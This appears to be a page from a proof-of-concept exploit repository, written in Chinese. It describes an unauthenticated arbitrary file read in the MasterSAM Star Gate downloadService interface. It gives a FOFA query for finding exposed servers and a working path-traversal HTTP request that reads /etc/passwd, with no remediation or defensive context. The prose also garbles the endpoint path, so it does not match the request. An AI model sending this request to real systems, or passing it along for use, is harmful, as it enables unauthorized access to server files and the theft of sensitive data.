POC/wpoc/MasterSAM/MasterSAM接口downloadService任意文件读取.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

585 B
Raw Blame History

MasterSAM接口downloadService任意文件读取

MasterSAM Star Gate的/adamaladamalduwnoadService接口存在任意文件下载漏洞未经身份验证的攻击者可以通过该漏洞下载服务器任意文件从而获取大量敏感信息。

fofa

body="MasterSAM"

poc

GET /adama/adama/downloadService?type=1&file=../../../../etc/passwd HTTP/1.1
Host: your-ip

图片

漏洞来源